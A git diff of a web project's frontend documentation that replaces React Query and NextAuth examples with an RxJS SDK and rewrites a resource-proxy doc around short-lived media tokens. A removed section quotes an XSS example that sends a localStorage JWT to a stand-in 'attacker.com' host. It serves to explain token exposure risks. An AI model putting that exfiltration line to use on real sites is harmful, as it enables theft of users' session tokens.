+(`apps/frontend/src/app/providers.tsx`). The `SemiontBrowser` singleton
+behind `SemiontProvider` carries all session state, so there is **no**
+per-layout auth/client provider:
 
 ```tsx
-// apps/frontend/src/app/[locale]/know/layout.tsx (excerpt)
-<AuthTokenProvider token={authToken}>
-  <ApiClientProvider baseUrl={kbBackendUrl(activeKnowledgeBase)} tokenRefresher={refreshActive}>
-    <OpenResourcesProvider openResourcesManager={openResourcesManager}>
-      <ResourceAnnotationsProvider>
-        {/* page content */}
-      </ResourceAnnotationsProvider>
-    </OpenResourcesProvider>
-  </ApiClientProvider>
-</AuthTokenProvider>
+<TranslationProvider translationManager={…}>
+  <SemiontProvider>            {/* sessions, KBs, the per-KB SemiontClient */}
+    <ToastProvider>
+      <LiveRegionProvider>
+        <KeyboardShortcutsProvider>
+          <ThemeProvider>
+            {/* app */}
+          </ThemeProvider>
+        </KeyboardShortcutsProvider>
+      </LiveRegionProvider>
+    </ToastProvider>
+  </SemiontProvider>
+</TranslationProvider>
 ```
 
-`EventBusProvider` is mounted higher in the tree (one bus per
-workspace). `AuthShell` wraps the whole authenticated subtree:
+Protected layouts additionally mount `AuthShell`, which adds the protected
+error boundary and the session-expired / permission-denied modals (they
+read the active session's signals):
 
 ```tsx
 <AuthShell>
-  {/* the stack above, including AuthTokenProvider and everything it nests */}
+  {/* authenticated routes */}
 </AuthShell>
 ```
 
 The library owns provider implementations; the frontend owns the
-decision about where to mount them. For the provider API reference
+decision about where to mount them. For the provider/session API reference
 (props, hooks, behavior), see
 [`packages/react-ui/docs/SESSION.md`](../../../packages/react-ui/docs/SESSION.md).
 
@@ -122,7 +129,7 @@ decision about where to mount them. For the provider API reference
 ### Basic usage
 
 ```tsx
-import { Toolbar, ResourceViewer, useApiClient } from '@semiont/react-ui';
+import { Toolbar, ResourceViewer, useSemiont } from '@semiont/react-ui';
 ```
 
 Components read from the provider stack via hooks — no explicit props
@@ -135,14 +142,19 @@ Flow VMs and namespace methods return RxJS Observables. The
 `useObservable` hook bridges them into React state:
 
 ```tsx
-import { useApiClient, useObservable } from '@semiont/react-ui';
+import { useSemiont, useObservable } from '@semiont/react-ui';
 
 function ResourceTitle({ resourceId }) {
-  const semiont = useApiClient();
-  const resource = useObservable(semiont.browse.resource(resourceId));
+  // The client lives on the active session (null until one is active)
+  const client = useObservable(useSemiont().activeSession$)?.client;
+  const resource = useObservable(client?.browse.resource(resourceId));
   return <h1>{resource?.name}</h1>;
 }
 ```
+
+Most components reach for a dedicated hook (`useResourceContent`,
+`useMediaToken`, the flow state units) rather than reading the client
+directly.
 
 Cache invalidation, refetching, and bus-driven updates happen inside
 `BrowseNamespace` — the component only sees the current value.

--- a/apps/frontend/docs/DEVELOPMENT.md
+++ b/apps/frontend/docs/DEVELOPMENT.md
@@ -180,19 +180,16 @@ export default function Dashboard() {
 **2. Create component** in `src/components/`:
 ```typescript
 // src/components/DashboardContent.tsx
-import { api } from "@/lib/http-transport";
-import { useKnowledgeBaseSession } from "@semiont/react-ui";
+import { useSemiont, useObservable } from "@semiont/react-ui";
 
 export function DashboardContent() {
-  const { isFullyAuthenticated } = useKnowledgeBaseSession();
-  const { data, isLoading, error } = api.dashboard.getData.useQuery();
+  const session = useObservable(useSemiont().activeSession$);
+  // Verb-namespace queries on the client return RxJS Observables; `useObservable`
+  // bridges them into React state (e.g. session?.client.browse.entityTypes()).
+  const data = useObservable(session?.client.browse.entityTypes());
 
-  if (!isFullyAuthenticated) {
-    return <div>Please sign in to view dashboard</div>;
-  }
-
-  if (isLoading) return <div>Loading...</div>;
-  if (error) return <div>Error: {error.message}</div>;
+  if (!session) return <div>Please sign in to view dashboard</div>;
+  if (!data) return <div>Loading...</div>;
 
   return (
     <div>
@@ -207,41 +204,28 @@ export function DashboardContent() {
 
 See [API Integration Guide](./API-INTEGRATION.md) for complete details.
 
-**Quick example**:
+**Quick example**: data access is exposed by `@semiont/sdk` as verb-namespace
+methods on `SemiontClient` (e.g. `client.browse.*`) that return RxJS Observables
+backed by EventBus-invalidated caches. Adding a new read means:
+
 ```typescript
-// 1. Define types in src/lib/http-transport.ts
-interface DashboardDataResponse {
-  metrics: {
-    activeUsers: number;
-    totalPosts: number;
-    systemStatus: string;
-  };
-  recentActivity: Activity[];
+// 1. The OpenAPI spec + generated types define the response shape
+//    (specs/ → @semiont/core types). No hand-written response interfaces.
+
+// 2. The SDK exposes it as a namespace method returning an Observable
+//    (added in @semiont/sdk, e.g. BrowseNamespace.dashboard(): Observable<DashboardData>)
+
+// 3. The component subscribes via useObservable — no React Query, no manual cache keys
+import { useSemiont, useObservable } from '@semiont/react-ui';
+
+function Dashboard() {
+  const session = useObservable(useSemiont().activeSession$);
+  const data = useObservable(session?.client.browse.dashboard());
+  // EventBus domain events invalidate and refresh the cache automatically.
 }
-
-// 2. Add API service method
-export const apiService = {
-  dashboard: {
-    getData: (): Promise<DashboardDataResponse> =>
-      apiClient.get('/api/dashboard/data'),
-  },
-};
-
-// 3. Add React Query hook
-export const api = {
-  dashboard: {
-    getData: {
-      useQuery: () => {
-        return useQuery({
-          queryKey: ['dashboard.data'],
-          queryFn: () => apiService.dashboard.getData(),
-          enabled: !!useKnowledgeBaseSession().isFullyAuthenticated,
-        });
-      }
-    }
-  }
-};
 ```
+
+See [API Integration Guide](./API-INTEGRATION.md) for the namespace + bus model.
 
 ### Adding New UI Components
 
@@ -342,41 +326,27 @@ export function useLocalStorage<T>(key: string, initialValue: T) {
 **1. Create protected route wrapper**:
 ```typescript
 // src/components/ProtectedRoute.tsx
-"use client";
-
-import { useKnowledgeBaseSession } from "@semiont/react-ui";
-import { useRouter } from "@/i18n/routing";
+import { useSemiont, useObservable } from "@semiont/react-ui";
+import { useNavigate } from "react-router-dom";
 import { useEffect } from "react";
 
-interface ProtectedRouteProps {
-  children: React.ReactNode;
-  requireFullAuth?: boolean;
-}
-
-export function ProtectedRoute({
-  children,
-  requireFullAuth = false
-}: ProtectedRouteProps) {
-  const { isAuthenticated, isFullyAuthenticated, isLoading } = useKnowledgeBaseSession();
-  const router = useRouter();
+export function ProtectedRoute({ children }: { children: React.ReactNode }) {
+  const browser = useSemiont();
+  const session = useObservable(browser.activeSession$);
+  const activating = useObservable(browser.sessionActivating$) ?? false;
+  const navigate = useNavigate();
 
   useEffect(() => {
-    if (!isLoading) {
-      const hasRequiredAuth = requireFullAuth ? isFullyAuthenticated : isAuthenticated;
-
-      if (!hasRequiredAuth) {
-        router.push('/auth/signin');
-      }
+    if (!activating && !session) {
+      navigate('/auth/signin');
     }
-  }, [isAuthenticated, isFullyAuthenticated, isLoading, requireFullAuth, router]);
+  }, [session, activating, navigate]);
 
-  if (isLoading) {
+  if (activating) {
     return <div className="flex justify-center p-8">Loading...</div>;
   }
 
-  const hasRequiredAuth = requireFullAuth ? isFullyAuthenticated : isAuthenticated;
-
-  return hasRequiredAuth ? <>{children}</> : null;
+  return session ? <>{children}</> : null;
 }
 ```
 
@@ -387,7 +357,7 @@ import { ProtectedRoute } from "@/components/ProtectedRoute";
 
 export default function AdminPage() {
   return (
-    <ProtectedRoute requireFullAuth={true}>
+    <ProtectedRoute>
       <AdminContent />
     </ProtectedRoute>
   );

--- a/apps/frontend/docs/DEVELOPMENT.md
+++ b/apps/frontend/docs/DEVELOPMENT.md
@@ -423,7 +423,7 @@ const envSchema = z.object({
 
 ### Authentication Issues
 - Check browser dev tools Network tab
-- Verify httpOnly JWT cookie in Application tab > Cookies
+- Confirm requests carry an `Authorization: Bearer <jwt>` header — the access token lives in JS memory (held by the SDK session), not in a cookie
 - Check /api/auth/me response for current session state
 - Verify backend is running and accessible
 
@@ -467,7 +467,7 @@ const envSchema = z.object({
 
 **Solutions**:
 - Check backend logs for OAuth errors
-- Verify httpOnly cookie is being set (Application tab in devtools)
+- Confirm the SDK session captured an access token after login — it's held in JS memory and sent as `Authorization: Bearer`, not set as a cookie
 - Check /api/auth/me returns correct user data
 - Ensure OAuth callback URL in Google Cloud Console points to backend (/api/auth/oauth/google/callback)
 

--- a/apps/frontend/docs/FUTURE.md
+++ b/apps/frontend/docs/FUTURE.md
@@ -105,7 +105,7 @@ val documents = client.documentsApi.listDocuments()
 - **Framework**: React Native + Expo
 - **API Client**: `@semiont/http-transport` (reuse existing!)
 - **Storage**: AsyncStorage + SQLite
-- **Sync**: React Query with persistence
+- **Sync**: `@semiont/sdk` observable caches, with the bus gateway (SSE) for live updates
 - **Auth**: expo-auth-session for OAuth
 
 **Key Advantages**:
@@ -117,16 +117,16 @@ val documents = client.documentsApi.listDocuments()
 **Starting Point**:
 ```typescript
 // apps/mobile-app
-import { api } from '@semiont/http-transport';
-import { QueryClient, QueryClientProvider } from '@tanstack/react-query';
+import { SemiontClient } from '@semiont/sdk';
+import { useObservable } from '@semiont/react-ui';
 
-function DocumentList() {
-  const { data, isLoading } = api.documents.list.useQuery();
+function ResourceList({ semiont }: { semiont: SemiontClient }) {
+  const resources = useObservable(semiont.browse.resources());
 
   return (
     <FlatList
-      data={data?.documents}
-      renderItem={({ item }) => <DocumentCard document={item} />}
+      data={resources ?? []}
+      renderItem={({ item }) => <ResourceCard resource={item} />}
     />
   );
 }

--- a/apps/frontend/docs/MEDIA-ACCESS.md
+++ b/apps/frontend/docs/MEDIA-ACCESS.md
@@ -1,11 +1,10 @@
 # Authenticated Media Access
 
-> **Heads-up on the filename.** This doc used to describe a Next.js server-side
-> *proxy route* (`/api/resources/[id]`). That route is **gone** — the frontend
-> is now a pure Vite + React SPA (#557) with **no server**, and auth is
-> **bearer-only** (#890). There is nothing to proxy through. The live mechanism
-> is the **`?token=` media token** documented here; the `RESOURCE-PROXY` filename
-> is kept only so inbound links don't break.
+> **What changed.** This doc used to describe a Next.js server-side *proxy route*
+> (`/api/resources/[id]`) and was named `RESOURCE-PROXY.md`. That route is **gone**
+> — the frontend is now a pure Vite + React SPA (#557) with **no server**, and auth
+> is **bearer-only** (#890). There is nothing to proxy through; the live mechanism
+> is the **`?token=` media token** documented below.
 
 ## The problem: header-less elements can't authenticate
 

--- a/apps/frontend/docs/PERFORMANCE.md
+++ b/apps/frontend/docs/PERFORMANCE.md
@@ -71,13 +71,10 @@ import Image from 'next/image';
 
 ### 3. API Caching
 
-Configured with TanStack Query for optimal data fetching:
+Server data is cached by the SDK's `browse` observable caches — no per-call cache configuration. A live query is shared and deduplicated across all subscribers and revalidated by backend domain events:
 ```typescript
-const { data } = api.documents.list.useQuery({
-  staleTime: 1000 * 60 * 5,  // Cache for 5 minutes
-  cacheTime: 1000 * 60 * 30,  // Keep in cache for 30 minutes
-  refetchOnWindowFocus: false  // Don't refetch on window focus
-});
+// Shared, deduplicated cache; re-emits when the resource changes
+const resources = useObservable(semiont.browse.resources());
 ```
 
 ### 4. Error Boundaries

--- a/apps/frontend/docs/RESOURCE-PROXY.md
+++ b/apps/frontend/docs/RESOURCE-PROXY.md
@@ -1,434 +1,130 @@
-# Resource Proxy Architecture
+# Authenticated Media Access
 
-## Overview
+> **Heads-up on the filename.** This doc used to describe a Next.js server-side
+> *proxy route* (`/api/resources/[id]`). That route is **gone** — the frontend
+> is now a pure Vite + React SPA (#557) with **no server**, and auth is
+> **bearer-only** (#890). There is nothing to proxy through. The live mechanism
+> is the **`?token=` media token** documented here; the `RESOURCE-PROXY` filename
+> is kept only so inbound links don't break.
 
-The frontend includes an authenticated proxy route at `/api/resources/[id]` that forwards browser requests for images, PDFs, and other resource representations to the backend with proper authentication. This document explains why this proxy is necessary and how it enables browser-based components like `<img>` tags and PDF.js to access authenticated resources.
+## The problem: header-less elements can't authenticate
 
-## The Problem: Browser Elements and PDF.js Can't Send Auth Headers
-
-HTML elements like `<img>`, `<iframe>`, `<video>`, and `<embed>` **cannot send custom HTTP headers**. Similarly, **PDF.js** (used by `PdfAnnotationCanvas`) fetches PDFs using the `fetch` API, but cannot access the server-side NextAuth JWT token:
+Semiont's backend is **bearer-only** — every request must carry
+`Authorization: Bearer <jwt>`, and there are **no ambient credentials** —
+nothing the browser attaches automatically, no cookie of any kind. That's a problem
+for the elements that load binary content, because they **cannot set request
+headers**:
 
 ```html
-<!-- ❌ This doesn't work - no way to add Authorization header -->
-<img src="https://backend.semiont.com/resources/123" />
-
-<!-- ❌ This also doesn't work -->
-<img src="https://backend.semiont.com/resources/123"
-     headers='{"Authorization": "Bearer xyz"}' />
+<!-- ❌ No way to attach Authorization: Bearer on an <img> -->
+<img src="https://backend.example.com/api/resources/123" />
 ```
 
 ```typescript
-// ❌ PDF.js cannot access httpOnly session cookie
+// ❌ PDF.js fetches by URL and likewise cannot add an Authorization header
 const pdf = await pdfjsLib.getDocument({
-  url: 'https://backend.semiont.com/resources/123',
-  // No way to add Authorization header without exposing JWT
+  url: 'https://backend.example.com/api/resources/123',
 }).promise;
 ```
 
-The only headers these elements send are:
-- **Cookies** for the domain (but backend expects Bearer tokens, not NextAuth sessions)
-- Standard headers (`Accept`, `User-Agent`, `Referer`, etc.)
+`<img>`, `<iframe>`, `<video>`, `<embed>`, and PDF.js URL-loading all send only
+the browser's standard headers. With no cookie to fall back on (bearer-only),
+they can't reach a protected resource on their own.
 
-Since Semiont requires authentication for resource access, browser elements and PDF.js cannot directly load authenticated resources from the backend.
+## The solution: a short-lived, resource-scoped token on the URL
 
-## The Solution: Authenticated Proxy
-
-The frontend proxy route solves this by acting as an authentication bridge:
-
-```
-Browser <img src="/api/resources/123">
-  ↓ (sends NextAuth session cookie - httpOnly, secure)
-Next.js Proxy (/api/resources/[id])
-  ↓ (extracts JWT from encrypted session server-side)
-  ↓ (adds Authorization: Bearer header)
-Backend (/resources/123)
-  ↓ (validates JWT)
-  ↓ (returns image/PDF/content)
-```
-
-**For PDF annotations**, the flow is identical:
+The frontend mints a **media token** — a narrowed credential the browser *can*
+carry, because it rides on the URL as a query parameter rather than in a header:
 
 ```typescript
-// PdfAnnotationCanvas.tsx
-const pdfUrl = `/api/resources/${resourceId}`; // ✅ Proxy route
-
-// Browser-side PDF.js fetch
-const response = await fetch(pdfUrl, {
-  credentials: 'include', // ✅ Sends NextAuth session cookie
-  headers: { 'Accept': 'application/pdf' }
-});
-
-// Proxy extracts JWT, forwards to backend with Authorization header
-// Backend returns PDF binary with Content-Type: application/pdf
+const { token } = await client.auth.mediaToken(resourceId);
+const url = `${client.baseUrl}/api/resources/${resourceId}?token=${token}`;
+// Hand `url` to <img src>, pdfjsLib.getDocument({ url }), etc.
 ```
 
-### Implementation
+`auth.mediaToken` calls `POST /api/tokens/media` (itself authenticated with the
+session's bearer token) and returns `{ token }`. The token is a JWT scoped to
+**exactly one resource** (`sub: resourceId`) and expiring in **5 minutes**. The
+backend accepts it on `GET /api/resources/:id` in place of the `Authorization`
+header.
 
-**File**: `apps/frontend/src/app/api/resources/[id]/route.ts`
+**This preserves authentication — it doesn't bypass it.** Getting a media token
+requires a valid session. The full claim format, validation, and OpenAPI spec
+live in the canonical
+[`@semiont/http-transport` MEDIA-TOKENS.md](../../../packages/http-transport/docs/MEDIA-TOKENS.md);
+this doc covers how the SPA uses it.
 
-The proxy performs four key functions:
+### Isn't a token in the URL a security hole?
 
-1. **Session validation** (lines 21-25):
-   ```typescript
-   const session = await getServerSession(authOptions);
-   if (!session?.backendToken) {
-     return new NextResponse('Unauthorized', { status: 401 });
-   }
-   ```
+A *session* token in a URL would be — query strings leak into proxy logs,
+browser history, and `Referer` headers, and a leaked session token grants the
+attacker hours of full access. A **media token's blast radius is tiny**:
+5 minutes × one specific resource. The `sub: resourceId` claim is the
+load-bearing safety property — a leaked media token is cryptographically useless
+against any *other* resource, even one the same user could open with their
+session token. That scoping is exactly why putting it on the URL is acceptable
+where putting a session token there would not be. See the **Threat model**
+section of [MEDIA-TOKENS.md](../../../packages/http-transport/docs/MEDIA-TOKENS.md).
 
-2. **Accept header filtering** (lines 32-40):
-   ```typescript
-   // Strip application/ld+json and application/json
-   // Forces backend to return raw representations (images, PDFs, etc.)
-   acceptHeader = acceptHeader
-     .split(',')
-     .filter(type => !type.includes('application/ld+json') && !type.includes('application/json'))
-     .join(', ') || '*/*';
-   ```
+## React usage
 
-3. **JWT injection** (lines 44-47):
-   ```typescript
-   const client = new SemiontApiClient({
-     baseUrl: backendUrl as BaseUrl,
-     eventBus: new EventBus(),
-     token$: new BehaviorSubject<AccessToken | null>(session.backendToken as AccessToken),
-   });
-   ```
-
-4. **Streaming proxy** (lines 49-63):
-   ```typescript
-   const { stream, contentType } = await client.getResourceRepresentationStream(rId, {
-     accept: acceptHeader as ContentFormat,
-   });
-
-   return new NextResponse(stream, {
-     status: 200,
-     headers: {
-       'Content-Type': contentType,
-       'Cache-Control': 'public, max-age=31536000, immutable',
-     },
-   });
-   ```
-
-## Why This Architecture Makes Sense
-
-### 1. Security: No JWT Exposure
-
-**Problem**: If we exposed the JWT to client-side JavaScript, it would be vulnerable to XSS attacks:
-
-```javascript
-// ❌ BAD: JWT accessible to JavaScript
-localStorage.setItem('jwt', token);
-
-// Any XSS attack can steal it:
-<script>
-  fetch('https://attacker.com/steal?jwt=' + localStorage.getItem('jwt'));
-</script>
-```
-
-**Solution**: The proxy keeps the JWT on the server-side:
-
-- ✅ JWT stored in encrypted NextAuth session (httpOnly cookie)
-- ✅ Client-side JavaScript **cannot access** httpOnly cookies
-- ✅ XSS attacks **cannot steal** the JWT
-- ✅ JWT only exists in server memory during proxy request
-
-### 2. Clean Separation of Concerns
-
-The proxy maintains a clear architectural boundary:
-
-```
-┌─────────────────────────────────────┐
-│ Frontend (Next.js + NextAuth)       │
-│ - Manages encrypted sessions        │
-│ - Extracts JWT for API calls        │
-│ - Knows about NextAuth internals    │
-└─────────────────────────────────────┘
-                 ↓ JWT Bearer Token
-┌─────────────────────────────────────┐
-│ Backend (Hono API)                  │
-│ - Only knows about JWT              │
-│ - Pure API service                  │
-│ - Framework agnostic                │
-└─────────────────────────────────────┘
-```
-
-**Benefits**:
-- Backend doesn't need to know about NextAuth sessions
-- Backend only handles standard Bearer token authentication
-- Frontend can change session management without touching backend
-- Clear responsibility boundaries
-
-### 3. Memory Efficiency: Streaming
-
-The proxy uses streaming to avoid loading entire files into memory:
+Components don't manage tokens by hand. The `useMediaToken` hook from
+`@semiont/react-ui` fetches a token on mount and refreshes it every **4 minutes**
+— ahead of the 5-minute expiry, so an in-flight load never races the rollover:
 
 ```typescript
-// Get resource as stream (not buffered)
-const { stream, contentType } = await client.getResourceRepresentationStream(rId, {
-  accept: acceptHeader as ContentFormat,
-});
+import { useMediaToken } from '@semiont/react-ui';
 
-// Stream directly to client - backend → proxy → browser
-return new NextResponse(stream, {
-  status: 200,
-  headers: { 'Content-Type': contentType },
-});
+const { token, loading } = useMediaToken(resourceId);
+const src = token ? `${baseUrl}/api/resources/${resourceId}?token=${token}` : undefined;
 ```
 
-This is critical for large files:
-- Images (can be several MB)
-- **PDFs (can be 10s of MB)** - especially important for `PdfAnnotationCanvas`
-- Videos (can be 100s of MB)
+`ResourceViewerPage` calls this automatically for any resource whose media type
+renders as an image (which includes `application/pdf`), so callers of
+`ResourceViewerPage` get authenticated `<img>`/PDF rendering for free.
 
-Without streaming, each request would load the entire file into Node.js memory before sending to client. For a 20MB PDF, this would consume 20MB of server memory per concurrent request.
+## Data flow for binary resources
 
-### 4. Standard Pattern
-
-This is a **well-established pattern** in modern web applications:
-
-- Next.js + backend API: Proxy routes for authenticated resources
-- React SPA + backend API: Server-side proxy for auth injection
-- Any framework + OAuth: Session-to-bearer-token translation layer
-
-It's not a workaround - it's the **correct solution** for authenticated resources in browsers.
-
-## Alternative Approaches (And Why They're Worse)
-
-### ❌ Alternative 1: Make Backend Route Public
-
-```typescript
-// Remove authentication from /resources/:id
-export function createResourceRouter(): ResourcesRouterType {
-  const router = new Hono();
-  // No authMiddleware!
-  return router;
-}
+```
+ResourceViewerPage
+  → useMediaToken(resourceId)
+      → POST /api/tokens/media   (bearer-authenticated, once per 4 min)
+      → { token }
+  → resourceUrl = `${baseUrl}/api/resources/${id}?token=${token}`
+  → passes resourceUrl to the viewer component
+  → <img src={resourceUrl}>  or  pdfjsLib.getDocument({ url: resourceUrl })
+      → browser / PDF.js fetches directly and streams — no ArrayBuffer in JS
 ```
 
-**Problems**:
-- Anyone can access any resource without authentication
-- Massive security hole
-- Defeats entire authentication system
+Streaming directly through the browser (rather than buffering the bytes into the
+JS heap) keeps large files — multi-MB images, tens-of-MB PDFs — off the main
+thread and preserves progressive rendering and HTTP cache participation.
 
-### ❌ Alternative 2: Token in URL Query Parameter
+## Text resources don't use media tokens
 
-```html
-<img src="https://backend.semiont.com/resources/123?token=eyJhbGc..." />
-```
+The split is **display vs programmatic**, not text vs binary:
 
-**Problems**:
-- **Exposes JWT in URLs** (browser history, server logs, referrer headers)
-- Tokens leaked to any external resources the page links to
-- Major security vulnerability
-- Visible in browser dev tools
+- **Text** (`text/plain`, `text/markdown`, …) is fetched by `useResourceContent`
+  through the authenticated representation endpoint and decoded to a string —
+  a normal bearer-authenticated request, no media token.
+- **Binary display** (`<img>`, PDF.js) uses media tokens, as above.
+- **Non-browser consumers** (CLI, daemon, MCP server) never need a media token:
+  they read binary content through `IContentTransport.getBinary` with normal
+  `Authorization` headers, and upload through `client.yield.resource(...)` /
+  `IContentTransport.putBinary`. Media tokens are read-path-only and browser-only.
 
-### ⚠️ Alternative 3: Backend Reads Session Cookie
+## Related documentation
 
-Make backend decrypt NextAuth sessions:
-
-```typescript
-// Backend middleware
-const sessionCookie = c.req.cookie('next-auth.session-token');
-const decoded = await decode({
-  token: sessionCookie,
-  secret: process.env.NEXTAUTH_SECRET!,
-});
-```
-
-**Problems**:
-- Couples backend to NextAuth implementation
-- Backend must install `next-auth` npm package
-- Backend must share `NEXTAUTH_SECRET` with frontend
-- Backend tests now require NextAuth session encryption
-- Loses framework independence
-- More complex secret management
-
-**When this would be acceptable**:
-- You're committed to Next.js forever (no framework changes)
-- Backend and frontend are truly a monolith (deployed together)
-- You're willing to maintain NextAuth compatibility in backend
-
-### ⚠️ Alternative 4: Signed URLs
-
-Backend generates time-limited signed URLs:
-
-```typescript
-// Frontend requests signed URL
-const signedUrl = await fetch('/api/resources/123/signed-url').then(r => r.json());
-
-// Browser loads with signature (no auth needed)
-<img src={signedUrl.url} />
-// URL: /resources/123?signature=abc123&expires=1234567890
-```
-
-**Trade-offs**:
-- ✅ No JWT exposure
-- ✅ Time-limited access
-- ✅ Works with `<img>` tags
-- ⚠️ Extra API call to get signed URL
-- ⚠️ More complex backend logic
-- ⚠️ Requires HMAC secret management
-
-**When this would make sense**:
-- Resources need to be shared publicly for limited time
-- CDN caching is critical
-- Resources are accessed frequently from many IPs
-
-## Current Deployment Architecture
-
-Semiont uses Envoy to route requests on a single origin:
-
-```yaml
-# .devcontainer/envoy.yaml
-routes:
-  # Frontend proxy (handles authentication)
-  - match: { prefix: "/api/resources" }
-    route: { cluster: frontend }  # → localhost:3000
-
-  # Backend API (requires Bearer token)
-  - match: { prefix: "/resources" }
-    route: { cluster: backend }   # → localhost:4000
-```
-
-**Flow**:
-```
-Browser → localhost:8080/api/resources/123 (Envoy)
-  ↓ (routes to frontend)
-Next.js → localhost:3000/api/resources/123
-  ↓ (adds auth, calls backend)
-Backend → localhost:4000/resources/123
-  ↓ (validates JWT, returns content)
-```
-
-Even though everything is on the same origin via Envoy, the proxy is still valuable because:
-1. **Security**: Keeps JWT extraction server-side
-2. **Clean abstraction**: Backend only handles Bearer tokens
-3. **Framework independence**: Can swap Next.js without touching backend
-4. **Testing simplicity**: Backend tests only need JWTs
-
-## Performance Considerations
-
-### Latency
-
-The proxy adds **one additional network hop**:
-
-- Without proxy: Browser → Backend (1 hop)
-- With proxy: Browser → Frontend → Backend (2 hops)
-
-**Mitigation**:
-- Envoy routes on localhost (sub-millisecond routing)
-- Streaming prevents memory buffering
-- Aggressive caching headers (`max-age=31536000, immutable`)
-
-For most resources, the latency overhead is **negligible** compared to the security and architectural benefits.
-
-### Caching
-
-The proxy sets aggressive caching headers:
-
-```typescript
-headers: {
-  'Cache-Control': 'public, max-age=31536000, immutable',
-}
-```
-
-**Why this works**:
-- Resources are content-addressed (checksum-based storage)
-- Once stored, a resource never changes
-- If content changes, it gets a new ID
-- Browser caches responses for 1 year
-
-This means the proxy only runs **once per resource per client**. Subsequent requests hit the browser cache.
-
-## Testing
-
-The proxy simplifies testing by maintaining clear boundaries:
-
-**Backend tests** (only need JWT):
-```typescript
-const res = await app.request('/resources/123', {
-  headers: { Authorization: `Bearer ${testJWT}` }
-});
-```
-
-**Frontend tests** (can mock the proxy):
-```typescript
-// Mock the proxy route in MSW for images
-http.get('/api/resources/:id', () => {
-  return HttpResponse.arrayBuffer(mockImageBuffer, {
-    headers: { 'Content-Type': 'image/png' }
-  });
-});
-
-// Mock for PDFs (used by PdfAnnotationCanvas)
-http.get('/api/resources/:id', () => {
-  return HttpResponse.arrayBuffer(mockPdfBuffer, {
-    headers: { 'Content-Type': 'application/pdf' }
-  });
-});
-```
-
-Without the proxy, backend tests would need to mock NextAuth session encryption, creating unnecessary coupling.
-
-## Summary
-
-The resource proxy is a **75-line route** that provides:
-
-1. ✅ **Security**: No JWT exposure to client-side JavaScript
-2. ✅ **Clean architecture**: Backend stays framework-agnostic
-3. ✅ **Memory efficiency**: Streaming for large files
-4. ✅ **Standard pattern**: Widely used in modern web apps
-5. ✅ **Testing simplicity**: Clear boundaries for isolated tests
-6. ✅ **Browser compatibility**: Works with `<img>`, `<iframe>`, etc.
-
-The proxy is not a workaround - it's the **correct architectural solution** for authenticated resources in browser applications.
-
-## Usage Examples
-
-### Image Tags
-
-```typescript
-// ImageViewer.tsx
-<img
-  src={`/api/resources/${resourceId}`}
-  alt="Resource"
-/>
-```
-
-### PDF Annotation Canvas
-
-```typescript
-// PdfAnnotationCanvas.tsx
-const pdfUrl = `/api/resources/${resourceId}`;
-
-// PDF.js loads the PDF
-const response = await fetch(pdfUrl, {
-  credentials: 'include',
-  headers: { 'Accept': 'application/pdf' }
-});
-const arrayBuffer = await response.arrayBuffer();
-const pdf = await pdfjsLib.getDocument({ data: arrayBuffer }).promise;
-```
-
-The proxy automatically:
-1. Validates the user's session
-2. Extracts the JWT from the encrypted session cookie
-3. Forwards the request to the backend with `Authorization: Bearer {jwt}`
-4. Streams the PDF binary back to the browser
-5. Sets proper caching headers for content-addressed resources
-
-## Related Documentation
-
-- [Frontend Authentication Architecture](./AUTHENTICATION.md) - Complete authentication system
-- [Backend Authentication Guide](../../backend/docs/AUTHENTICATION.md) - Backend JWT validation
-- [System Authentication Architecture](../../../docs/system/administration/AUTHENTICATION.md) - End-to-end auth flows
+- [`@semiont/http-transport` MEDIA-TOKENS.md](../../../packages/http-transport/docs/MEDIA-TOKENS.md) — the canonical media-token spec (claims, threat model, OpenAPI)
+- [Frontend Authentication Architecture](./AUTHENTICATION.md) — the SPA's bearer-only session model
+- [Backend Authentication Guide](../../backend/docs/AUTHENTICATION.md) — JWT validation, including the `?token=` media path
+- [System Authentication Architecture](../../../docs/system/administration/AUTHENTICATION.md) — end-to-end auth flows
 
 ---
 
-**Last Updated**: 2026-02-03
-**Implementation**: `apps/frontend/src/app/api/resources/[id]/route.ts` (69 lines)
-**Key Components**:
-- `apps/frontend/src/app/api/resources/[id]/route.ts` - Proxy route
-- `packages/react-ui/src/components/pdf-annotation/PdfAnnotationCanvas.tsx` - PDF usage
-- `packages/react-ui/src/lib/browser-pdfjs.ts` - PDF.js wrapper
+**Last Updated**: 2026-06-20
+**Key implementation**:
+- `packages/react-ui/src/hooks/useMediaToken.ts` — the refreshing token hook
+- `packages/react-ui/src/features/resource-viewer/components/ResourceViewerPage.tsx` — builds the `?token=` URL for binary resources
+- `packages/sdk/src/namespaces/auth.ts` — `auth.mediaToken()` → `POST /api/tokens/media`
+- `packages/react-ui/src/lib/browser-pdfjs.ts` — PDF.js loader that consumes the `?token=` URL

--- a/apps/frontend/docs/TESTING.md
+++ b/apps/frontend/docs/TESTING.md
@@ -345,9 +345,12 @@ TypeScript provides compile-time validation across all components:
 
 ```typescript
 // All components are fully typed
-export function GreetingSection(): JSX.Element {
-  const { data, error, isLoading } = api.hello.greeting.useQuery();
-  // TypeScript ensures data structure matches API contract
+export function ResourceTitle({ id }: { id: ResourceId }): JSX.Element {
+  const semiont = useObservable(useSemiont().activeSession$)?.client;
+  const resource = useObservable(semiont?.browse.resource(id));
+  // `resource` is typed ResourceDescriptor | undefined — the compiler
+  // enforces the shape the API contract guarantees
+  return <h1>{resource?.title}</h1>;
 }
 ```
 
@@ -533,9 +536,11 @@ export function ResourcePage() {
 
 ```typescript
 // packages/react-ui/src/components/__tests__/ResourceViewer.test.tsx
-import { render, screen } from '@testing-library/react';
+import { screen } from '@testing-library/react';
+import { BehaviorSubject } from 'rxjs';
+import { BrowseNamespace } from '@semiont/sdk';
 import { ResourceViewer } from '../ResourceViewer';
-import { TestProviders } from '../../test-utils';
+import { renderWithProviders } from '../../test-utils';
 
 it('renders resource title', async () => {
   const mockResource = {
@@ -544,14 +549,11 @@ it('renders resource title', async () => {
     content: 'Test content'
   };
 
-  render(
-    <TestProviders
-      apiClient={{ resources: { get: { useQuery: () => ({ data: mockResource }) } } }}
-      translations={{ 'resource.title': 'Resource Title' }}
-    >
-      <ResourceViewer resourceId="123" />
-    </TestProviders>
-  );
+  // Emit the mock from the SDK's browse query (spy on the namespace prototype)
+  vi.spyOn(BrowseNamespace.prototype, 'resource')
+    .mockReturnValue(new BehaviorSubject(mockResource) as never);
+
+  renderWithProviders(<ResourceViewer resourceId="123" />);
 
   expect(await screen.findByText('Resource Title')).toBeInTheDocument();
   expect(screen.getByText('Test Resource')).toBeInTheDocument();
